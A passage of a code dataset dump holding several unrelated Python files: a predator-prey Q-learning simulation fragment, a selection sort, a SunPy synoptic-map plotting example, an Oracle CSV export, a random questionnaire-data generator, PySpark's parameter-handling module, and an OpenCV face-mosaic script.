self.ai = qlearn.QLearn(actions=range(Actions.directions),alpha=0.1, gamma=0.9, epsilon=0.1)\n self.eaten = 0 \n Prey.dictionaryOfPreys[(self.gridX,self.gridY)] = self \n \n def getPredatorPositionsInNeighborhood(self):\n neighborGrids = self.getNeighborGridCoordinates()\n predatorPositionsInNeighborhood = []\n for neighborGrid in neighborGrids:\n if(Predator.Predator.dictionaryOfPredators.has_key(neighborGrid)):\n predatorPositionsInNeighborhood.append(neighborGrid)\n return predatorPositionsInNeighborhood\n \n def getNeighborGridCoordinates(self):\n positionsOfNeighborGrids = []\n lookAroundDistance = 2 \n for i in range (-lookAroundDistance,lookAroundDistance + 1):\n for j in range (-lookAroundDistance,lookAroundDistance + 1):\n if((abs(i) + abs(j) <= lookAroundDistance) and (not (i==0 and j==0))):\n neighborPosition = (self.gridX + i, self.gridY + j)\n if(self.isWithinBounds(neighborPosition[0],neighborPosition[1])):\n positionsOfNeighborGrids.append(neighborPosition)\n return positionsOfNeighborGrids\n \n def update(self):\n return\n #Override this for all subclasses\n# state = self.calculateState()\n# reward = -20\n# \n# #Check if the animat is on a food Intensity gradient \n# if(self.rewardForProximityToFood()):\n# reward += -1*(1 - self.rewardForProximityToFood())\n# \n# if(self.hasPredatorInNeighborhood()):\n# reward += -40\n# \n# if (self.gridX,self.gridY) in self.previousPositionTuples:\n# reward += -20\n# \n# #Check if the animat has been eaten by any of the predators \n# if(self.isBeingEatenByPredator()):\n# self.eaten += 1\n# reward = -200\n# if self.lastState is not None:\n# self.ai.learn(self.lastState,self.lastAction,reward,state)\n# \n# #Since the prey will be re-spawned, reset the last state\n# self.lastState = None\n# self.respawnAtRandomPosition()\n# return\n# \n# if(self.isEatingFood()):\n# #Remove the food being eaten\n# eatenFood = Food.dictionaryOfFoodObjects.pop((self.gridX,self.gridY))\n# eatenFood.gotEaten()\n# eatenFoodCell = self.grid.cellMatrix[eatenFood.gridX][eatenFood.gridY]\n# eatenFoodCell.foodIntensity = 0\n# eatenFood = None\n# self.fed += 1\n# reward += 100\n# \n# #Reward for being in between offspring and predator\n# reward += self.rewardForProtection() \n# \n# if(self.lastState is not None):\n# self.ai.learn(self.lastState,self.lastAction,reward,state)\n# \n# state = self.calculateState()\n# action = self.ai.chooseAction(state)\n# self.lastState = state\n# self.lastAction = action\n# self.setPrevious2Positions()\n# 
self.performAction(action)\n# self.drawGameObjectAtCurrentPosition() \n \n\n def hasPredatorInNeighborhood(self):\n predatorsInNeighborHood = self.getPredatorPositionsInNeighborhood()\n if(len(predatorsInNeighborHood) > 0):\n return True\n return False\n \n def isBeingEatenByPredator(self):\n return self.isCellOnAnyPredator((self.gridX,self.gridY))\n \n def calculateState(self):\n def stateValueForNeighbor(neighborCellCoordinates):\n currentCellState = ()\n if self.isCellOnAnyPredator(neighborCellCoordinates):\n currentCellState += (4,)\n if self.isCellOnAnyFood(neighborCellCoordinates):\n currentCellState += (3,)\n if self.isCellOnAnyObstacle(neighborCellCoordinates):\n currentCellState = (2,) \n if self.hasNoObjectOnCell(neighborCellCoordinates):\n currentCellState = (0,)\n \n if bool(self.getCellFoodIntensity(neighborCellCoordinates)):\n currentCellState += (self.getCellFoodIntensity(neighborCellCoordinates),)\n \n return currentCellState\n \n return tuple([stateValueForNeighbor(neighborCellCoordinates) for neighborCellCoordinates in self.getNeighborGridCoordinates()])\n\n def getCellFoodIntensity(self,neighborCellCoordinates):\n cell = self.grid.cellMatrix[neighborCellCoordinates[0]][neighborCellCoordinates[1]]\n return cell.foodIntensity\n \n def hasNoObjectOnCell(self,gridCoordinatesOfCell):\n return (not (self.isCellOnAnyFood(gridCoordinatesOfCell))) and (not(self.isCellOnAnyObstacle(gridCoordinatesOfCell))) and (not(self.isCellOnAnyPredator(gridCoordinatesOfCell))) and not(self.getCellFoodIntensity(gridCoordinatesOfCell))\n \n def isEatingFood(self):\n return self.isCellOnAnyFood((self.gridX,self.gridY))\n \n def isCellOnAnyPredator(self,gridCoordinatesOfCell):\n predatorKeys = Predator.Predator.dictionaryOfPredators.keys() #Keys are tuples and Values are references to the actual predator object\n for predatorPosition in predatorKeys:\n if(gridCoordinatesOfCell == predatorPosition):\n return True\n return False\n \n def isCellOnAnyFood(self,gridCoordinatesForCell):\n if(Food.dictionaryOfFoodObjects.has_key(gridCoordinatesForCell)): \n return True\n return False\n \n def isCellOnAnyObstacle(self,gridCoordinatesForCell):\n if(Obstacle.dictionaryOfObstacles.has_key(gridCoordinatesForCell)): \n return True\n return False\n \n def move(self, directionX, directionY):\n #Override for subclass\n Animat.move(self, directionX, directionY)\n# oldXPosition = self.gridX\n# oldYPosition = self.gridY \n# nextXPosition = self.gridX + directionX\n# nextYPosition = self.gridY + directionY\n# if(self.isMovementPossible(nextXPosition, nextYPosition)):\n# #If prey is in new position \n# if(not Prey.dictionaryOfPrey.has_key((nextXPosition,nextYPosition))):\n# #Another Prey is not on the next Position, so valid movement\n# Animat.move(self, directionX, directionY)\n# Prey.dictionaryOfPrey.pop((oldXPosition,oldYPosition))\n# Prey.dictionaryOfPrey[(self.gridX,self.gridY)] = self;\n \n def respawnAtRandomPosition(self):\n #Override for subclass\n return\n# oldXPosition = self.gridX\n# oldYPosition = self.gridY\n# \n# randomX = random.randrange(0,self.grid.numberOfColumns)\n# randomY = random.randrange(0,self.grid.numberOfRows)\n# self.setXYPosition(randomX, randomY)\n# \n# Prey.dictionaryOfPrey.pop((oldXPosition,oldYPosition))\n# while Prey.dictionaryOfPrey.has_key((self.gridX,self.gridY)):\n# randomX = random.randrange(0,self.grid.numberOfColumns)\n# randomY = random.randrange(0,self.grid.numberOfRows)\n# self.setXYPosition(randomX, randomY)\n# Prey.dictionaryOfPrey[(self.gridX,self.gridY)] = self \n \n 
def rewardForProximityToFood(self): \n cell = self.grid.cellMatrix[self.gridX][self.gridY] \n return cell.foodIntensity\n \n def findAngleTo(self,x1,y1):\n pi = np.pi\n x0 = self.gridX\n y0 = self.gridY\n deltaX = x1 - x0\n deltaY = y1 - y0\n if(deltaX == 0):\n deltaX = 0.000000001\n theta = None\n \n slope = deltaY/deltaX\n \n if deltaX >= 0:\n #Q1 or Q4\n if deltaY >= 0:\n #Q1\n theta = np.arctan(slope)\n else:\n #Q4\n theta = 2*pi + np.arctan(slope)\n else:\n #Q2 or Q3\n if deltaY >= 0:\n #Q2\n theta = pi + np.arctan(slope)\n else:\n #Q3\n theta = 3*pi/2 - np.arctan(slope)\n \n return round(theta * 180 / pi)\n \n \n ","sub_path":"src/Prey.py","file_name":"Prey.py","file_ext":"py","file_size_in_byte":8775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"97557645","text":"arr = [64, 25, 10, 22, 11]\n\n# 첫번째 단계 [0,n-1] / n까지 해도 상관없으나 속도가 느리고 의미없다.\nm = 0\nfor i in range(len(arr)):\n m = i\n for j in range(i+1,len(arr)):\n if arr[m] > arr[j]:\n m = j \n arr[i],arr[m] = arr[m],arr[i]\nprint(arr)\n","sub_path":"ssafy_daejeon-master/02 List2/연습장3.py","file_name":"연습장3.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"248144356","text":"\"\"\"\nHMI Daily Synoptic Map\n----------------------\n\nIn this example we load the Daily Synoptic Maps produced by the HMI team. This\ndata is an interesting demonstration of SunPy's Map class as it is not in the\nmore common Helioprojective coordinate system, it is in Heliographic Carrington\ncoordinates and in a non-trivial Cylindrical Equal Area projection.\n\nThis example plots the HMI Daily Synoptic Maps, the file used in this example\ncan be downloaded from\n`here `_\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nfrom astropy.utils.data import download_file\n\nimport sunpy.map\n\n###############################################################################\n# Use astropy to download the file to a temp location.\n\nfilename = download_file(\n 'http://jsoc.stanford.edu/data/hmi/synoptic/hmi.Synoptic_Mr.2191.fits', cache=True)\n\n###############################################################################\n# We read this file in as a Map.\n\nsyn_map = sunpy.map.Map(filename)\n\n###############################################################################\n# There are a couple of oddities with this file, firstly the value of 'CUNIT2':\n\nprint(syn_map.meta['CUNIT2'])\n\n###############################################################################\n# That is not a unit! What this is telling us is that the latitude coordinate\n# is actually the sine of latitude. According to the Thompson (2006) paper,\n# CUNIT2 should be in degrees and CDELT2 should be multiplied by 180/pi. 
Also\n# the value of CDELT1 has the wrong sign.\n\nsyn_map.meta['CUNIT2'] = 'degree'\nsyn_map.meta['CDELT2'] = 180 / np.pi * syn_map.meta['CDELT2']\nsyn_map.meta['CDELT1'] *= -1\n\n###############################################################################\n# Now we create a SunPy Map from the data and header:\n\n# Set the colorbar properties.\nsyn_map.plot_settings['cmap'] = 'hmimag'\nsyn_map.plot_settings['norm'] = plt.Normalize(-1500, 1500)\n\n###############################################################################\n# Create a figure with the Map's projection:\nfig = plt.figure(figsize=(12, 5))\naxes = plt.subplot(projection=syn_map)\n\n# Plot the image\nim = syn_map.plot()\n\n# Set up the Sine Latitude Grid\nx = axes.coords[0]\ny = axes.coords[1]\n\nx.set_coord_type('longitude', coord_wrap=360.)\ny.set_coord_type('latitude')\n\nx.set_major_formatter('dd')\ny.set_major_formatter('dd')\n\nx.set_axislabel(\"Carrington Longitude [deg]\")\ny.set_axislabel(\"Latitude [deg]\")\n\nx.set_ticks(color='black', exclude_overlapping=True)\ny.set_ticks(color='black', exclude_overlapping=True)\n\n# Hide the grid\naxes.coords.grid(color='black', alpha=0.6, linestyle='dotted', linewidth=0.5)\n\n# Create a colorbar\ncb = plt.colorbar(im, fraction=0.019, pad=0.1)\ncb.set_label(\"LOS Magnetic Field [Gauss]\")\n\n# Another horrible hack to make the ticks draw on the RHS\naxes.set_ylim((1, syn_map.data.shape[0] - 1))\n\nplt.title(\"{} {}-{}\".format(syn_map.meta['content'], syn_map.meta['CAR_ROT'],\n syn_map.meta['CAR_ROT'] + 1))\n\nplt.show()\n","sub_path":"examples/plotting/hmi_synoptic_maps.py","file_name":"hmi_synoptic_maps.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"129459549","text":"import csv\n \nimport cx_Oracle\n \nconnection = cx_Oracle.connect(\"ihor\", \"dreyev\", \"xe\")\n \ncursor = connection.cursor()\n \ncursor.execute(\"\"\"\nSELECT\n\tTRIM(id) as id,\n\tTRIM(name) as name,\n\tTRIM(room_id) as room_id,\n\tTRIM(hostel_id) as hostel_id,\n\tTRIM(computer_id) as computer_id\nFROM student\n\n\"\"\")\n \n \n \nwith open(\"result.csv\", \"w\", newline=\"\") as file:\n\twriter = csv.writer(file)\n\tfor stud_id, stud_name, room_id, hostel_id, computer_id in cursor:\n \n\n \n \twriter.writerow([stud_id, stud_name, room_id, hostel_id, computer_id])\n\n \n \ncursor.close()\n","sub_path":"km52/Dreiev_Ihor/csv_export.py","file_name":"csv_export.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"443650596","text":"# -*- encoding: utf-8 -*-\r\n'''\r\n@File : 问卷星随机选择数据存为excel.py\r\n@Time : 2020/03/09 16:47:23\r\n@Author : Zhang tao \r\n@Version : 1.0\r\n@Desc : 问卷星随机选择数据存为excel.py\r\n'''\r\n\r\n\r\ndef getData():\r\n data = {}\r\n from pyquery import PyQuery as pq\r\n html = pq('https://www.wjx.cn/m/59597032.aspx')\r\n for line in html('.field.ui-field-contain').items():\r\n q = line('.field-label')\r\n qu = q.text()\r\n ans = [t.text for t in line.find('.label')]\r\n data[qu] = ans\r\n return data\r\n\r\n\r\ndef writeExcel(data,num):\r\n import xlwt\r\n import random\r\n workbook = xlwt.Workbook(encoding='utf-8')\r\n worksheet = workbook.add_sheet('调查', cell_overwrite_ok=True)\r\n le = len(data)\r\n keys = list(data.keys())\r\n for l in range(le):\r\n worksheet.write(0, l, keys[l])\r\n i = 1\r\n va = [list(v) for v in data.values()]\r\n # print(va, len(va))\r\n while i <= num:\r\n 
[random.shuffle(v) for v in va]\r\n myV = []\r\n myV += [va[c][0] for c in range(5)]\r\n rt = random.randint(1, 4)\r\n myV += [','.join(random.sample(va[5], rt))]\r\n myV += [va[c][0] for c in range(6, 9)]\r\n myV += [','.join(random.sample(va[9], rt))]\r\n myV += [va[c][0] for c in range(10, 19)]\r\n myV += [','.join(random.sample(va[19], rt))]\r\n myV += [va[c][0] for c in range(20, 33)]\r\n myV += [','.join(random.sample(va[t], rt)) for t in range(33, 35)]\r\n for l in range(le):\r\n worksheet.write(i, l, myV[l])\r\n i += 1\r\n workbook.save('D:\\excel.xls')\r\n print('finished!')\r\n\r\n\r\ndata = getData()\r\n# print(data)\r\nwriteExcel(data,2000)\r\n","sub_path":"leetcode+牛客/问卷星随机选择数据存为excel.py","file_name":"问卷星随机选择数据存为excel.py","file_ext":"py","file_size_in_byte":1693,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"541756370","text":"#\n# Licensed to the Apache Software Foundation (ASF) under one or more\n# contributor license agreements. See the NOTICE file distributed with\n# this work for additional information regarding copyright ownership.\n# The ASF licenses this file to You under the Apache License, Version 2.0\n# (the \"License\"); you may not use this file except in compliance with\n# the License. You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport array\nfrom abc import ABCMeta\nimport copy\nfrom typing import (\n Any,\n Callable,\n Generic,\n List,\n Optional,\n overload,\n TypeVar,\n Union,\n TYPE_CHECKING,\n)\n\nimport numpy as np\nfrom py4j.java_gateway import JavaObject\n\nfrom pyspark.ml.linalg import DenseVector, Vector, Matrix\nfrom pyspark.ml.util import Identifiable\n\n\nif TYPE_CHECKING:\n from pyspark.ml._typing import ParamMap\n\n__all__ = [\"Param\", \"Params\", \"TypeConverters\"]\n\nT = TypeVar(\"T\")\nP = TypeVar(\"P\", bound=\"Params\")\n\n\nclass Param(Generic[T]):\n \"\"\"\n A param with self-contained documentation.\n\n .. 
versionadded:: 1.3.0\n \"\"\"\n\n def __init__(\n self,\n parent: Identifiable,\n name: str,\n doc: str,\n typeConverter: Optional[Callable[[Any], T]] = None,\n ):\n if not isinstance(parent, Identifiable):\n raise TypeError(\"Parent must be an Identifiable but got type %s.\" % type(parent))\n self.parent = parent.uid\n self.name = str(name)\n self.doc = str(doc)\n self.typeConverter = TypeConverters.identity if typeConverter is None else typeConverter\n\n def _copy_new_parent(self, parent: Any) -> \"Param\":\n \"\"\"Copy the current param to a new parent, must be a dummy param.\"\"\"\n if self.parent == \"undefined\":\n param = copy.copy(self)\n param.parent = parent.uid\n return param\n else:\n raise ValueError(\"Cannot copy from non-dummy parent %s.\" % parent)\n\n def __str__(self) -> str:\n return str(self.parent) + \"__\" + self.name\n\n def __repr__(self) -> str:\n return \"Param(parent=%r, name=%r, doc=%r)\" % (self.parent, self.name, self.doc)\n\n def __hash__(self) -> int:\n return hash(str(self))\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, Param):\n return self.parent == other.parent and self.name == other.name\n else:\n return False\n\n\nclass TypeConverters:\n \"\"\"\n Factory methods for common type conversion functions for `Param.typeConverter`.\n\n .. versionadded:: 2.0.0\n \"\"\"\n\n @staticmethod\n def _is_numeric(value: Any) -> bool:\n vtype = type(value)\n return vtype in [int, float, np.float64, np.int64] or vtype.__name__ == \"long\"\n\n @staticmethod\n def _is_integer(value: Any) -> bool:\n return TypeConverters._is_numeric(value) and float(value).is_integer()\n\n @staticmethod\n def _can_convert_to_list(value: Any) -> bool:\n vtype = type(value)\n return vtype in [list, np.ndarray, tuple, range, array.array] or isinstance(value, Vector)\n\n @staticmethod\n def _can_convert_to_string(value: Any) -> bool:\n vtype = type(value)\n return isinstance(value, str) or vtype in [np.unicode_, np.string_, np.str_]\n\n @staticmethod\n def identity(value: \"T\") -> \"T\":\n \"\"\"\n Dummy converter that just returns value.\n \"\"\"\n return value\n\n @staticmethod\n def toList(value: Any) -> List:\n \"\"\"\n Convert a value to a list, if possible.\n \"\"\"\n if type(value) == list:\n return value\n elif type(value) in [np.ndarray, tuple, range, array.array]:\n return list(value)\n elif isinstance(value, Vector):\n return list(value.toArray())\n else:\n raise TypeError(\"Could not convert %s to list\" % value)\n\n @staticmethod\n def toListFloat(value: Any) -> List[float]:\n \"\"\"\n Convert a value to list of floats, if possible.\n \"\"\"\n if TypeConverters._can_convert_to_list(value):\n value = TypeConverters.toList(value)\n if all(map(lambda v: TypeConverters._is_numeric(v), value)):\n return [float(v) for v in value]\n raise TypeError(\"Could not convert %s to list of floats\" % value)\n\n @staticmethod\n def toListListFloat(value: Any) -> List[List[float]]:\n \"\"\"\n Convert a value to list of list of floats, if possible.\n \"\"\"\n if TypeConverters._can_convert_to_list(value):\n value = TypeConverters.toList(value)\n return [TypeConverters.toListFloat(v) for v in value]\n raise TypeError(\"Could not convert %s to list of list of floats\" % value)\n\n @staticmethod\n def toListInt(value: Any) -> List[int]:\n \"\"\"\n Convert a value to list of ints, if possible.\n \"\"\"\n if TypeConverters._can_convert_to_list(value):\n value = TypeConverters.toList(value)\n if all(map(lambda v: TypeConverters._is_integer(v), value)):\n return [int(v) for v in 
value]\n raise TypeError(\"Could not convert %s to list of ints\" % value)\n\n @staticmethod\n def toListString(value: Any) -> List[str]:\n \"\"\"\n Convert a value to list of strings, if possible.\n \"\"\"\n if TypeConverters._can_convert_to_list(value):\n value = TypeConverters.toList(value)\n if all(map(lambda v: TypeConverters._can_convert_to_string(v), value)):\n return [TypeConverters.toString(v) for v in value]\n raise TypeError(\"Could not convert %s to list of strings\" % value)\n\n @staticmethod\n def toVector(value: Any) -> Vector:\n \"\"\"\n Convert a value to a MLlib Vector, if possible.\n \"\"\"\n if isinstance(value, Vector):\n return value\n elif TypeConverters._can_convert_to_list(value):\n value = TypeConverters.toList(value)\n if all(map(lambda v: TypeConverters._is_numeric(v), value)):\n return DenseVector(value)\n raise TypeError(\"Could not convert %s to vector\" % value)\n\n @staticmethod\n def toMatrix(value: Any) -> Matrix:\n \"\"\"\n Convert a value to a MLlib Matrix, if possible.\n \"\"\"\n if isinstance(value, Matrix):\n return value\n raise TypeError(\"Could not convert %s to matrix\" % value)\n\n @staticmethod\n def toFloat(value: Any) -> float:\n \"\"\"\n Convert a value to a float, if possible.\n \"\"\"\n if TypeConverters._is_numeric(value):\n return float(value)\n else:\n raise TypeError(\"Could not convert %s to float\" % value)\n\n @staticmethod\n def toInt(value: Any) -> int:\n \"\"\"\n Convert a value to an int, if possible.\n \"\"\"\n if TypeConverters._is_integer(value):\n return int(value)\n else:\n raise TypeError(\"Could not convert %s to int\" % value)\n\n @staticmethod\n def toString(value: Any) -> str:\n \"\"\"\n Convert a value to a string, if possible.\n \"\"\"\n if isinstance(value, str):\n return value\n elif type(value) in [np.string_, np.str_, np.unicode_]:\n return str(value)\n else:\n raise TypeError(\"Could not convert %s to string type\" % type(value))\n\n @staticmethod\n def toBoolean(value: Any) -> bool:\n \"\"\"\n Convert a value to a boolean, if possible.\n \"\"\"\n if type(value) == bool:\n return value\n else:\n raise TypeError(\"Boolean Param requires value of type bool. Found %s.\" % type(value))\n\n\nclass Params(Identifiable, metaclass=ABCMeta):\n \"\"\"\n Components that take parameters. This also provides an internal\n param map to store parameter values attached to the instance.\n\n .. versionadded:: 1.3.0\n \"\"\"\n\n def __init__(self) -> None:\n super(Params, self).__init__()\n #: internal param map for user-supplied values param map\n self._paramMap: \"ParamMap\" = {}\n\n #: internal param map for default values\n self._defaultParamMap: \"ParamMap\" = {}\n\n #: value returned by :py:func:`params`\n self._params: Optional[List[Param]] = None\n\n # Copy the params from the class to the object\n self._copy_params()\n\n def _copy_params(self) -> None:\n \"\"\"\n Copy all params defined on the class to current object.\n \"\"\"\n cls = type(self)\n src_name_attrs = [(x, getattr(cls, x)) for x in dir(cls)]\n src_params = list(filter(lambda nameAttr: isinstance(nameAttr[1], Param), src_name_attrs))\n for name, param in src_params:\n setattr(self, name, param._copy_new_parent(self))\n\n @property\n def params(self) -> List[Param]:\n \"\"\"\n Returns all params ordered by name. 
The default implementation\n uses :py:func:`dir` to get all attributes of type\n :py:class:`Param`.\n \"\"\"\n if self._params is None:\n self._params = list(\n filter(\n lambda attr: isinstance(attr, Param),\n [\n getattr(self, x)\n for x in dir(self)\n if x != \"params\" and not isinstance(getattr(type(self), x, None), property)\n ],\n )\n )\n return self._params\n\n def explainParam(self, param: Union[str, Param]) -> str:\n \"\"\"\n Explains a single param and returns its name, doc, and optional\n default value and user-supplied value in a string.\n \"\"\"\n param = self._resolveParam(param)\n values = []\n if self.isDefined(param):\n if param in self._defaultParamMap:\n values.append(\"default: %s\" % self._defaultParamMap[param])\n if param in self._paramMap:\n values.append(\"current: %s\" % self._paramMap[param])\n else:\n values.append(\"undefined\")\n valueStr = \"(\" + \", \".join(values) + \")\"\n return \"%s: %s %s\" % (param.name, param.doc, valueStr)\n\n def explainParams(self) -> str:\n \"\"\"\n Returns the documentation of all params with their optionally\n default values and user-supplied values.\n \"\"\"\n return \"\\n\".join([self.explainParam(param) for param in self.params])\n\n def getParam(self, paramName: str) -> Param:\n \"\"\"\n Gets a param by its name.\n \"\"\"\n param = getattr(self, paramName)\n if isinstance(param, Param):\n return param\n else:\n raise ValueError(\"Cannot find param with name %s.\" % paramName)\n\n def isSet(self, param: Union[str, Param[Any]]) -> bool:\n \"\"\"\n Checks whether a param is explicitly set by user.\n \"\"\"\n param = self._resolveParam(param)\n return param in self._paramMap\n\n def hasDefault(self, param: Union[str, Param[Any]]) -> bool:\n \"\"\"\n Checks whether a param has a default value.\n \"\"\"\n param = self._resolveParam(param)\n return param in self._defaultParamMap\n\n def isDefined(self, param: Union[str, Param[Any]]) -> bool:\n \"\"\"\n Checks whether a param is explicitly set by user or has\n a default value.\n \"\"\"\n return self.isSet(param) or self.hasDefault(param)\n\n def hasParam(self, paramName: str) -> bool:\n \"\"\"\n Tests whether this instance contains a param with a given\n (string) name.\n \"\"\"\n if isinstance(paramName, str):\n p = getattr(self, paramName, None)\n return isinstance(p, Param)\n else:\n raise TypeError(\"hasParam(): paramName must be a string\")\n\n @overload\n def getOrDefault(self, param: str) -> Any:\n ...\n\n @overload\n def getOrDefault(self, param: Param[T]) -> T:\n ...\n\n def getOrDefault(self, param: Union[str, Param[T]]) -> Union[Any, T]:\n\n \"\"\"\n Gets the value of a param in the user-supplied param map or its\n default value. 
Raises an error if neither is set.\n \"\"\"\n param = self._resolveParam(param)\n if param in self._paramMap:\n return self._paramMap[param]\n else:\n return self._defaultParamMap[param]\n\n def extractParamMap(self, extra: Optional[\"ParamMap\"] = None) -> \"ParamMap\":\n \"\"\"\n Extracts the embedded default param values and user-supplied\n values, and then merges them with extra values from input into\n a flat param map, where the latter value is used if there exist\n conflicts, i.e., with ordering: default param values <\n user-supplied values < extra.\n\n Parameters\n ----------\n extra : dict, optional\n extra param values\n\n Returns\n -------\n dict\n merged param map\n \"\"\"\n if extra is None:\n extra = dict()\n paramMap = self._defaultParamMap.copy()\n paramMap.update(self._paramMap)\n paramMap.update(extra)\n return paramMap\n\n def copy(self: P, extra: Optional[\"ParamMap\"] = None) -> P:\n \"\"\"\n Creates a copy of this instance with the same uid and some\n extra params. The default implementation creates a\n shallow copy using :py:func:`copy.copy`, and then copies the\n embedded and extra parameters over and returns the copy.\n Subclasses should override this method if the default approach\n is not sufficient.\n\n Parameters\n ----------\n extra : dict, optional\n Extra parameters to copy to the new instance\n\n Returns\n -------\n :py:class:`Params`\n Copy of this instance\n \"\"\"\n if extra is None:\n extra = dict()\n that = copy.copy(self)\n that._paramMap = {}\n that._defaultParamMap = {}\n return self._copyValues(that, extra)\n\n def set(self, param: Param, value: Any) -> None:\n \"\"\"\n Sets a parameter in the embedded param map.\n \"\"\"\n self._shouldOwn(param)\n try:\n value = param.typeConverter(value)\n except ValueError as e:\n raise ValueError('Invalid param value given for param \"%s\". %s' % (param.name, e))\n self._paramMap[param] = value\n\n def _shouldOwn(self, param: Param) -> None:\n \"\"\"\n Validates that the input param belongs to this Params instance.\n \"\"\"\n if not (self.uid == param.parent and self.hasParam(param.name)):\n raise ValueError(\"Param %r does not belong to %r.\" % (param, self))\n\n def _resolveParam(self, param: Union[str, Param]) -> Param:\n \"\"\"\n Resolves a param and validates the ownership.\n\n Parameters\n ----------\n param : str or :py:class:`Param`\n param name or the param instance, which must\n belong to this Params instance\n\n Returns\n -------\n :py:class:`Param`\n resolved param instance\n \"\"\"\n if isinstance(param, Param):\n self._shouldOwn(param)\n return param\n elif isinstance(param, str):\n return self.getParam(param)\n else:\n raise TypeError(\"Cannot resolve %r as a param.\" % param)\n\n def _testOwnParam(self, param_parent: str, param_name: str) -> bool:\n \"\"\"\n Test the ownership. Return True or False\n \"\"\"\n return self.uid == param_parent and self.hasParam(param_name)\n\n @staticmethod\n def _dummy() -> \"Params\":\n \"\"\"\n Returns a dummy Params instance used as a placeholder to\n generate docs.\n \"\"\"\n dummy = Params()\n dummy.uid = \"undefined\"\n return dummy\n\n def _set(self: P, **kwargs: Any) -> P:\n \"\"\"\n Sets user-supplied params.\n \"\"\"\n for param, value in kwargs.items():\n p = getattr(self, param)\n if value is not None:\n try:\n value = p.typeConverter(value)\n except TypeError as e:\n raise TypeError('Invalid param value given for param \"%s\". 
%s' % (p.name, e))\n self._paramMap[p] = value\n return self\n\n def clear(self, param: Param) -> None:\n \"\"\"\n Clears a param from the param map if it has been explicitly set.\n \"\"\"\n if self.isSet(param):\n del self._paramMap[param]\n\n def _setDefault(self: P, **kwargs: Any) -> P:\n \"\"\"\n Sets default params.\n \"\"\"\n for param, value in kwargs.items():\n p = getattr(self, param)\n if value is not None and not isinstance(value, JavaObject):\n try:\n value = p.typeConverter(value)\n except TypeError as e:\n raise TypeError(\n 'Invalid default param value given for param \"%s\". %s' % (p.name, e)\n )\n self._defaultParamMap[p] = value\n return self\n\n def _copyValues(self, to: P, extra: Optional[\"ParamMap\"] = None) -> P:\n \"\"\"\n Copies param values from this instance to another instance for\n params shared by them.\n\n Parameters\n ----------\n to : :py:class:`Params`\n the target instance\n extra : dict, optional\n extra params to be copied\n\n Returns\n -------\n :py:class:`Params`\n the target instance with param values copied\n \"\"\"\n paramMap = self._paramMap.copy()\n if isinstance(extra, dict):\n for param, value in extra.items():\n if isinstance(param, Param):\n paramMap[param] = value\n else:\n raise TypeError(\n \"Expecting a valid instance of Param, but received: {}\".format(param)\n )\n elif extra is not None:\n raise TypeError(\n \"Expecting a dict, but received an object of type {}.\".format(type(extra))\n )\n for param in self.params:\n # copy default params\n if param in self._defaultParamMap and to.hasParam(param.name):\n to._defaultParamMap[to.getParam(param.name)] = self._defaultParamMap[param]\n # copy explicitly set params\n if param in paramMap and to.hasParam(param.name):\n to._set(**{param.name: paramMap[param]})\n return to\n\n def _resetUid(self: P, newUid: Any) -> P:\n \"\"\"\n Changes the uid of this instance. 
This updates both\n the stored uid and the parent uid of params and param maps.\n This is used by persistence (loading).\n\n Parameters\n ----------\n newUid\n new uid to use, which is converted to unicode\n\n Returns\n -------\n :py:class:`Params`\n same instance, but with the uid and Param.parent values\n updated, including within param maps\n \"\"\"\n newUid = str(newUid)\n self.uid = newUid\n newDefaultParamMap = dict()\n newParamMap = dict()\n for param in self.params:\n newParam = copy.copy(param)\n newParam.parent = newUid\n if param in self._defaultParamMap:\n newDefaultParamMap[newParam] = self._defaultParamMap[param]\n if param in self._paramMap:\n newParamMap[newParam] = self._paramMap[param]\n param.parent = newUid\n self._defaultParamMap = newDefaultParamMap\n self._paramMap = newParamMap\n return self\n","sub_path":"python/pyspark/ml/param/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":19972,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"484604158","text":"import cv2\nfrom pathlib import Path\nimport time\nimport os\nimport psutil\n\nIMAGE_PATH = \"/Users/hinoueyuuya/大学/4年前期/並列分散処理/最終課題/man\"\n\ndef mosaic(src, ratio=0.1):\n small = cv2.resize(src, None, fx=ratio, fy=ratio, interpolation=cv2.INTER_NEAREST)\n return cv2.resize(small, src.shape[:2][::-1], interpolation=cv2.INTER_NEAREST)\n\ndef mosaic_area(src, x, y, width, height, ratio=0.1):\n dst = src.copy()\n dst[y:y + height, x:x + width] = mosaic(dst[y:y + height, x:x + width], ratio)\n return dst\n\ndef main():\n \"\"\" Generate 100 mosaic-processed images from 100 source images \"\"\"\n files = Path(IMAGE_PATH + \"/original/\").glob(\"*\")\n for file in files:\n src = cv2.imread(str(file))\n cascade_path = '/Users/hinoueyuuya/opt/anaconda3/lib/python3.7/site-packages/cv2/data/haarcascade_frontalface_default.xml'\n cascade = cv2.CascadeClassifier(cascade_path)\n src_gray = cv2.cvtColor(src, cv2.COLOR_BGR2GRAY)\n faces = cascade.detectMultiScale(src_gray)\n for x, y, w, h in faces:\n dst = mosaic_area(src, x, y, w, h)\n cv2.imwrite(IMAGE_PATH + \"/mosaic/\" + file.name, dst)\n\nif __name__ == \"__main__\":\n start = time.time()\n main()\n end = time.time()\n mem = psutil.virtual_memory() \n print(\"Memory usage is \" + str(mem.percent))\n cpu = psutil.cpu_percent(interval=1)\n print(\"CPU usage is \" + str(cpu))\n print(\"Finished in {} 